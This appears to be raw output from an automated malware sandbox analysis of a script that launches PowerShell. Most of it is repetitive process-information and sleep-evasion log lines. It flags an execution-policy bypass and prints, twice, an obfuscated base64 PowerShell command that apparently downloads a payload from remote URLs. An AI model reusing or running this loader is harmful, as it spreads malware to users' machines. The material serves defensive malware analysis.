Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1184	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1826	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3993	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5278	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2100	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1545	Jump to behavior

Source: C:\Windows\System32\wscript.exe TID: 6124	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2828	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6732	Thread sleep count: 3993 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3800	Thread sleep count: 5278 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4304	Thread sleep time: -14757395258967632s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4044	Thread sleep count: 2100 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4232	Thread sleep count: 1545 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1512	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6416	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: wscript.exe, 00000000.00000003.2078892658.000001680CCE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079326382.000001680CC91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079060783.000001680CC90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079511227.000001680CC91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2080298338.000001680CCE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2080219916.000001680CC91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079117086.000001680CCE5000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3Dg

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3Dg	Jump to behavior
